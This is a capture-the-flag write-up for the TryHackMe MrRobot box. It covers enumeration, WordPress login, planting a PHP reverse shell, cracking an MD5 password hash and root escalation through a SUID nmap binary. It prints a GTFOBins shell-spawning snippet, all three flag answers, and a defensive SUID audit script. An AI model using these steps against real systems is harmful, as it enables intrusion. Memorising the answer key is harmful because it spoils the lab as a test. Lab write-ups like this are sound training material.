TryHackMe - MrRobot

Summary

MrRobot, a Linux box created by user ben, was an easy box. The initial scan leads to robots.txt, which shows the first key and fsocity.dic; using that wordlist and the username elliot we get access to WordPress, from which we can get a shell. Cracking the MD5 hash lets us su as the robot user and grab the second key. Privilege escalation used the SUID nmap binary to get a shell as root.

Initial Scan

nmap scan

# Nmap 7.80 scan initiated Thu Apr 30 21:55:50 2020 as: nmap -sC -sV -oN nmap/mrrobot 10.10.130.158
Nmap scan report for 10.10.130.158
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 30 21:56:47 2020 -- 1 IP address (1 host up) scanned in 57.42 seconds

Manual Enumeration

Visiting http://10.10.130.158/robots.txt shows the first key path as key-1-of-3.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

WP-Login

Cracking the password for user elliot (this was a guess based on the box name), we get the password ER28-0652.

Low Privilege Shell

Using the Appearance editor we can change the code of any page, so I edited 404.php and placed the pentestmonkey PHP code to get a shell as daemon.

User

In the home directory of user robot there is a file, password.raw-md5, which we can read.

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Cracking the hash gives c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz

Using that we can su as robot and read key-2-of-3.txt

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation

Let's run linpeas.sh.

We see the kernel is vulnerable to exploit.

Let's see if there is some other, easier way to escalate privileges.

We also see that

/usr/local/bin/nmap

has the SUID bit set. Let's check GTFOBins to see how to get a shell using nmap.

We see we can get a shell using

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

But the installed nmap version doesn't support --script. We do see an interesting flag, --interactive,

using which we can get a shell as root

# uname -a;id;hostname
uname -a;id;hostname
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
linux

And we can grab key-3-of-3.txt:

# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

And we have pwned this box.
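
The root shell above came from a SUID bit on a program that can run commands. As an added example (not part of the original write-up), the script below audits a directory tree for SUID files and flags names from a shortlist; the `RISKY` list and the `audit_suid` function name are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original write-up): SUID audit for defenders.
# RISKY is an illustrative shortlist of programs that can spawn a shell or run
# arbitrary commands; it is an assumption of this example, not a complete list.
RISKY="nmap vim vi find bash sh dash less more nano awk python perl ruby env"

# audit_suid DIR
# Prints one line per SUID regular file under DIR:
#   RISKY  <path>   name is on the shortlist, the bit should almost never be set
#   review <path>   SUID but not on the shortlist, confirm it is expected
audit_suid() {
    root="${1:-/}"
    # -xdev stays on one filesystem; -perm -4000 matches the set-user-ID bit.
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict="review"
        for r in $RISKY; do
            if [ "$name" = "$r" ]; then
                verdict="RISKY"
            fi
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# Stand-alone use: sh audit_suid.sh /   (no argument: only defines the function)
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

On this box the scan would report `RISKY /usr/local/bin/nmap`; clearing the bit with `chmod u-s /usr/local/bin/nmap` closes this path to root.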

Questions to Answer

  1. What is key 1?

    073403c8a58a1f80d943455fb30724b9
  2. What is key 2?

    822c73956184f694993bede3eb39f959
  3. What is key 3?

    04787ddef27c3dee1ee161b21670b4e4
Author: Shubham Kumar
Link: https://f3v3r.in/thm/mrrobot/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.